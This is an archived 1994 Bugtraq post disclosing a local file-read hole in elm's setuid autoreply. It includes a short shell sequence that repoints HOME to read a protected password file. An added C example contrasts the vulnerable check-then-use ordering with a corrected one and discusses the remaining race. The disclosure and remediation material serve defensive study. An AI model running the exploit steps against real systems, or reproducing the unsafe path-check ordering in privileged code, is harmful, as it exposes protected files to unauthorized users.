Bugtraq mailing list archives
Another autoreply security hole
From: geiri () stud cs uit no (Geir Inge Jensen)
Date: Sat, 12 Mar 1994 11:04:12 +0100 (MET)
With all this talk about elm's autoreply bug, I thought that I should take a look at the source. Wow, what am I seeing - yet another security hole. Simpler and less powerful than the other, but still - it's there. It will take you a while to become root, but it is not impossible. Since most sysadmins have already removed autoreply, I can see no harm in posting it here.

You can exploit the hole to read any file on the system! (Including /.secure/etc/passwd, /dev/kmem, etc.)

Autoreply takes a filename as an argument. Then it checks that the real uid has permission to read the specified file. Fine, a suid program should do just that. But then it does the fatal thing: it checks whether the filename has a / in front of it, and if it doesn't, autoreply does things the easy way. The program just reads the environment variable $HOME to find the full path of the file...! Had this been done before the test of readability, things would have been fine, but after.... Well, autoreply doesn't complain about the file, and since arepdaemon has to run as root, it can read any specified file.

Hence, you can do the following:

    # cd $HOME
    # echo x > passwd
    # export HOME=/.secure/etc
    # autoreply passwd
    # mail geiri < /dev/null

And the file pops up in your inbox....

Bye,

--
Greetings from the Northernmost University in the World     ! To err is human,
Geir Inge Jensen, University of Tromsoe, Norway             ! to really foul up
---------------------------------------------------------   ! requires the
Internet: geiri () staff cs uit no   Fidonet: 2:212/8.17    ! root password...
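The defect the post describes is an ordering bug in a setuid program: the readability check is made on the argument as typed (relative to the current directory), and only afterwards is $HOME prepended to form the path that the root daemon actually opens. The following is an added example written for this archive page, not code from elm or from the autoreply source; the function names (resolve_unsafe, resolve_safe, demo_mismatch) and the /tmp sandbox it builds are assumptions for illustration. It reproduces the check-then-rebuild ordering beside a version that checks exactly the string it later uses, and demo_mismatch() replays the post's scenario (cwd holds a readable "passwd", HOME points somewhere else) against both.

```c
/* Added example, not the original autoreply code: contrasts a readability
 * check made on one path with the privileged use of a different path. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Build "<home>/<arg>", or copy arg verbatim when it starts with '/'.
 * Returns -1 if the result would not fit in out. */
static int build_path(const char *arg, const char *home, char *out, size_t n)
{
    int len = (arg[0] == '/') ? snprintf(out, n, "%s", arg)
                              : snprintf(out, n, "%s/%s", home, arg);
    return (len < 0 || (size_t)len >= n) ? -1 : 0;
}

/* Vulnerable ordering, as described in the post: access() is evaluated on
 * arg relative to the current directory (with the real uid, which is the
 * right idea), but the path handed back for the root daemon is $HOME/arg,
 * which was never checked. */
int resolve_unsafe(const char *arg, const char *home, char *out, size_t n)
{
    if (access(arg, R_OK) != 0)              /* checked: ./arg */
        return -1;
    return build_path(arg, home, out, n);    /* used:    $HOME/arg */
}

/* Corrected ordering: resolve the full path first, then check that exact
 * string. The checked path and the used path are now the same bytes. */
int resolve_safe(const char *arg, const char *home, char *out, size_t n)
{
    if (build_path(arg, home, out, n) != 0)
        return -1;
    if (access(out, R_OK) != 0)              /* checked and used: same path */
        return -1;
    return 0;
}

/* Constructed sandbox (assumption for this demo): <tmp>/user/passwd exists
 * and is readable; <tmp>/secret/ contains no passwd at all, so any
 * resolver that accepts "passwd" with HOME=<tmp>/secret has checked the
 * wrong file. Returns the sandbox root, or NULL on failure. */
static char sandbox[64];
static const char *make_sandbox(void)
{
    char p[128];
    snprintf(sandbox, sizeof sandbox, "/tmp/autoreply-demo-XXXXXX");
    if (mkdtemp(sandbox) == NULL)
        return NULL;
    snprintf(p, sizeof p, "%s/user", sandbox);   mkdir(p, 0700);
    snprintf(p, sizeof p, "%s/secret", sandbox); mkdir(p, 0700);
    snprintf(p, sizeof p, "%s/user/passwd", sandbox);
    FILE *f = fopen(p, "w");
    if (f == NULL)
        return NULL;
    fputs("x\n", f);                         /* mirrors "echo x > passwd" */
    fclose(f);
    return sandbox;
}

/* Replays the post's scenario: cwd = the user dir, HOME pointed at a
 * directory the check never looked at. Returns 1 when the unsafe resolver
 * accepts a path that the safe resolver rejects, 0 otherwise, -1 on error. */
int demo_mismatch(void)
{
    char userdir[128], secretdir[128], p[128], out[256];
    const char *root = make_sandbox();
    if (root == NULL)
        return -1;
    snprintf(userdir, sizeof userdir, "%s/user", root);
    snprintf(secretdir, sizeof secretdir, "%s/secret", root);
    if (chdir(userdir) != 0)
        return -1;
    int unsafe_ok = resolve_unsafe("passwd", secretdir, out, sizeof out) == 0;
    int safe_ok   = resolve_safe("passwd", secretdir, out, sizeof out) == 0;
    /* Tidy up the sandbox so repeated runs do not litter /tmp. */
    chdir("/");
    snprintf(p, sizeof p, "%s/user/passwd", root); unlink(p);
    snprintf(p, sizeof p, "%s/user", root);        rmdir(p);
    snprintf(p, sizeof p, "%s/secret", root);      rmdir(p);
    rmdir(root);
    return unsafe_ok && !safe_ok;
}

int main(void)
{
    printf("check/use mismatch reproduced: %s\n",
           demo_mismatch() == 1 ? "yes" : "no");
    return 0;
}
```

Even the corrected ordering only closes the gap the post describes; access() followed by a separate open() in a root daemon still leaves a window in which the file behind that path can be swapped. The stronger fix for a setuid helper is to open the file while the real uid is in effect (or drop privileges before opening) and let the kernel's permission check on the open itself be the only one that matters.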